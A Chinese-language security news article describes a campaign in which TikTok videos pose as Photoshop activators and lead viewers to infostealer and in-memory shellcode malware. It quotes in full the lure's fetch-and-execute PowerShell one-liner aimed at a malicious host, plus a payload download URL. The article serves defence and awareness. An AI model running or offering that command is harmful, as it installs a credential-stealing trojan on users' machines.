TikTok视频被武器化传播自编译PowerShell恶意软件

攻击者正在利用TikTok的巨大传播力，通过看似无害的视频诱骗用户执行恶意软件。

在一个受欢迎的TikTok视频（获赞超过500次）中，攻击者伪装成免费Photoshop激活工具提供商，敦促观众以管理员身份打开PowerShell并运行：

1

powershell iex (irm slmgr.win/photoshop)

该命令使用Invoke-Expression（iex）运行通过Invoke-RestMethod（irm）从恶意主机获取的脚本。

安全研究人员发现了一个攻击活动，威胁行为者在TikTok视频中伪装成Photoshop激活器，指导受害者运行PowerShell单行命令来拉取并执行恶意代码。

该技术与ClickFix社会工程场景相似，用户同样被诱骗在Microsoft博客上点击和执行代码，从而暴露于恶意软件安装风险。

访问提供的链接后，受害者会收到一个PowerShell有效负载（SHA256：6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23），目前在VirusTotal上的检测率为17/63，突显了其相对新颖性和规避能力。

初始脚本运行后，会访问https://file-epq.pages.dev/updater.exe下载下一阶段程序，名为Updater.exe（SHA256：58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8）。

分析显示该二进制文件是AuroStealer，一种已知用于窃取保存的浏览器密码和加密货币钱包的凭证窃取木马。

持久化机制

为了实现持久化，PowerShell脚本从合法的更新任务列表（例如AdobeUpdateTask、WindowsUpdateCheck）中随机选择一个任务名称。

然后创建一个计划任务，该任务以隐藏窗口样式启动PowerShell并绕过执行策略，确保在用户登录时运行Updater.exe而不引起怀疑。

使用合法任务名称有助于恶意持久化机制融入正常的系统行为并逃避检测。

在AuroStealer阶段之后，会检索并启动一个名为source.exe的进一步有效负载（SHA256：db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011）。

该二进制文件采用先进的自编译恶意软件技术：在执行期间，它调用.NET编译器csc.exe来编译存储在临时.cmdline文件中的源代码。

编译的类包含对VirtualAlloc、CreateThread和WaitForSingleObject的P/Invoke声明，使其能够分配内存，将shellcode直接注入进程，生成执行线程并无限期等待——实现完全在内存中执行有效负载而不触及磁盘。

这种按需编译使静态分析和检测复杂化，因为最终的恶意代码仅存在于短暂的内存中。

研究人员已识别出来自同一攻击活动的其他TikTok视频，使用不同的软件诱饵，如"激活Office"或"解锁Windows"，表明攻击者正在迭代社会工程主题以扩大其影响范围：

此活动突显了网络犯罪分子不断发展的策略，他们现在利用短视频平台通过PowerShell传递自编译的内存中恶意软件。

用户不应从未经验证的来源运行终端命令，平台应考虑在指令鼓励潜在危险操作时向观众发出警报。

随着攻击者不断创新，结合新颖的分发渠道和反分析技术，安全意识和强大的端点防御仍然是应对这些新兴威胁的最佳防线。